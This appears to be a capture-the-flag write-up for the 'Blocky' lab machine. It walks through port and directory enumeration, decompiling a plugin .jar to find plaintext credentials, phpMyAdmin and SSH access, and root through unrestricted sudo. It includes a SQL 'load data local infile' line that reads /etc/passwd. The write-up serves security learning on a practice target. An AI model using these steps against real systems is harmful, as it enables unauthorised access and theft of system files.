Summary

Blocky is an easy Linux box. It can be exploited by properly enumerating the application. Brute-forcing for files and directories results to a wiki page that discloses some useful information. This lead to checking the plugins directory which contains a .jar that can be analysed which contains plaintext credentials. These were used to authenticate to phpmyadmin. The wp-users table contained more plaintext credentials. These provided a shell as the notch user. Notch is allowed to execute all commands as sudo on the server so sudo su was used to get a root shell.


Discovery

Started off by running NmapAutomator.
Nmap discovered the following open ports and services:

PORT   STATE SERVICE VERSION
21/tcp open  ftp?
22/tcp open  ssh     OpenSSH 7.2p2 
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
25565/tcp open  minecraft Minecraft 1.11.2 

Navigating to the webserver shows a minecraft website. Gobuster was run to scan for files and directories:

http://10.129.1.53/wiki (Status: 301)
http://10.129.1.53/wp-content (Status: 301)
http://10.129.1.53/wp-login.php (Status: 200)
http://10.129.1.53/plugins (Status: 301)
http://10.129.1.53/wp-includes (Status: 301)
http://10.129.1.53/javascript (Status: 301)
http://10.129.1.53/index.php (Status: 301)
http://10.129.1.53/wp-trackback.php (Status: 200)
http://10.129.1.53/wp-admin (Status: 301)
http://10.129.1.53/phpmyadmin (Status: 301)
http://10.129.1.53/wp-signup.php (Status: 302)
http://10.129.1.53/server-status (Status: 403)

The wiki was checked and contained the following text:

Please check back later! We will start publishing wiki articles after we have finished the main server plugin! The new core plugin will store your playtime and other information in our database, so you can see your own stats!

Credential Discovery

This lead to navigating to the plugin directory where the following two files were found:

Since there was such a strong indication something is up with these files, they were analysed with jd-gui. It found the following plaintext credentials:

Tried to SSH but this did not work:

root@10.129.1.53's password: 
Permission denied, please try again.

Next, I authenticated to PHPMyAdmin with these credentials. This worked and by checking the wordpress tables, I found the following credentials:

FYI, you can also run SQL code so you could run something like this to obtain the passwd file:

load data local infile "/etc/passwd" into table wp_users FIELDS TERMINATED BY '\n';

Fortunately, these plaintext credentials could be used to create a SSH shell as Notch.


Privilege Escalation

It’s always a good idea to first check what commands your user is allowed to run with sudo -l:

notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
(ALL : ALL) ALL

Notch is allowed to run all commands as sudo so theres no need for actual privilege escalation, you can simply cat the root shell:

sudo cat /root/root.txt

If you want a proper root shell, use:

notch@Blocky:~$ sudo su
root@Blocky:/home/notch# id
uid=0(root) gid=0(root) groups=0(root)

Conclusion

This was a very simple and straightforward box, it didn’t take me long to root but I learned about a new tool jd-gui so it was useful nonetheless. Hope you enjoyed this writeup!